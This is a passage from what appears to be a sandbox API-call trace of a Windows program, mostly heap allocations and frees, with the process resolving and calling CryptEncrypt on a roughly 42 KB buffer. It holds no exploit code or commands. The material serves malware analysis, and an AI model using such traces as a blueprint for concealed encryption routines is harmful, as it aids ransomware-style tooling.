(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0144.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0144.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0144.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0144.852] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0144.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0144.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0144.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0144.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0144.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa377) returned 0x2f32a90 [0144.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32a90 | out: hHeap=0x970000) returned 1 [0144.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.860] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0144.860] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa377, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa378) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 